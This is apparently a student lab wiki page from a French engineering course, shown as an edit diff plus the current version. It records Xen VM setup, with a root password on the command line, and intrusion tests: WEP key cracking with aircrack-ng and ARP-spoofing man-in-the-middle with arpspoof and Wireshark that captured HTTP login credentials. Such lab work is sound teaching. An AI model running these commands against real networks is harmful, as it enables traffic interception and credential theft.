TP sysres IMA5sc 2020/2021 G9 : Différence entre versions

De Wiki d'activités IMA
(Tests d'intrusion)
(Man In The Middle)
Ligne 65 : Ligne 65 :
  
 
===Man In The Middle===
 
===Man In The Middle===
================(Homme du milieu en anglais)================
+
(Homme du milieu en anglais)
  
Sur un eeePC, on modifie le fichier /proc/sys/net/ipv4/ip_forward :
+
D'abord, sur le eeePC, on modifie le fichier /proc/sys/net/ipv4/ip_forward :
  
 
   echo 1 > /proc/sys/net/ipv4/ip_forward
 
   echo 1 > /proc/sys/net/ipv4/ip_forward
  
ensuite on utilise la commande du paquet dsniff :
+
Ensuite on utilise la commande du paquet dsniff :
  
 
   arpspoof -i eth0 -t 172.26.145.254 172.26.145.58
 
   arpspoof -i eth0 -t 172.26.145.254 172.26.145.58
 
   arpspoof -i eth0 -t 172.26.145.58 172.26.145.254
 
   arpspoof -i eth0 -t 172.26.145.58 172.26.145.254
  
ensuite on utilise wireshark pour observer les paquets
+
Enfin, on utilise wireshark pour observer les paquets.
 +
Pour tester l'attaque MiTM, nous avons essayer de nous connecter à un site utilisant un protocole http.
 +
 
 +
Sur wireshark, nous avons pu voir, en clair, les identifiants de connexion ainsi que le mot de passe saisi par l'utilisateur.

Version du 30 novembre 2020 à 16:37

Création de la VM

 root@capbreton:~# xen-create-image --hostname=Calicedelamort --ip=100.64.0.20 --netmask=255.255.255.240 --password=pasglop --dir=/usr/local/xen --dist=buster --gateway=100.64.0.5
 --- Logical volume ---
 LV Path                /dev/storage/PaulTanguy1
 LV Name                PaulTanguy1
 VG Name                storage
 LV UUID                Mk2sRM-HJvO-Ul2V-7z4A-WYDR-w2Rs-woO4FD
 LV Write Access        read/write
 LV Creation host, time capbreton, 2020-10-12 17:02:07 +0100
 LV Status              available
 # open                 0
 LV Size                10.00 GiB
 Current LE             2560
 Segments               1
 Allocation             inherit
 Read ahead sectors     auto
 - currently set to     256
 Block device           254:24
  
 --- Logical volume ---
 LV Path                /dev/storage/PaulTanguy2
 LV Name                PaulTanguy2
 VG Name                storage
 LV UUID                zWVz4u-2u2T-Fd1T-7W5X-G4Fg-M8dO-bEwuEt
 LV Write Access        read/write
 LV Creation host, time capbreton, 2020-10-12 17:02:11 +0100
 LV Status              available
 # open                 0
 LV Size                10.00 GiB
 Current LE             2560
 Segments               1
 Allocation             inherit
 Read ahead sectors     auto
 - currently set to     256
 Block device           254:25


Tests d'intrusion

Cassage de clef WEP d'un point d'accés Wifi

En premier lieu, on installe le paquetage aircrack-ng sur un PC.

Ensuite, on utilise les commandes suivantes :

 airmon-ng

Cette commande permet d'afficher les interfaces réseau

 airmon-ng start <interface>

Pour passer l'interface en mode monitor

 airodump-ng --encrypt wep 'nomInterface'

Pour afficher les réseaux wifi WEP

 airodump-ng --write 'nomFichier' --channel 3 -bssid '@mac_AP' 'nomInterface'

Pour capturer les paquets émis par le point d'accés ciblé

 aircrack-ng -x 'nomFichier'-01.cap

Pour cracker la clef WEP (à condition d'avoir capturé assez de paquets)


Man In The Middle

(Homme du milieu en anglais)

D'abord, sur le eeePC, on modifie le fichier /proc/sys/net/ipv4/ip_forward :

  echo 1 > /proc/sys/net/ipv4/ip_forward

Ensuite on utilise la commande du paquet dsniff :

 arpspoof -i eth0 -t 172.26.145.254 172.26.145.58
 arpspoof -i eth0 -t 172.26.145.58 172.26.145.254

Enfin, on utilise wireshark pour observer les paquets. Pour tester l'attaque MiTM, nous avons essayer de nous connecter à un site utilisant un protocole http.

Sur wireshark, nous avons pu voir, en clair, les identifiants de connexion ainsi que le mot de passe saisi par l'utilisateur.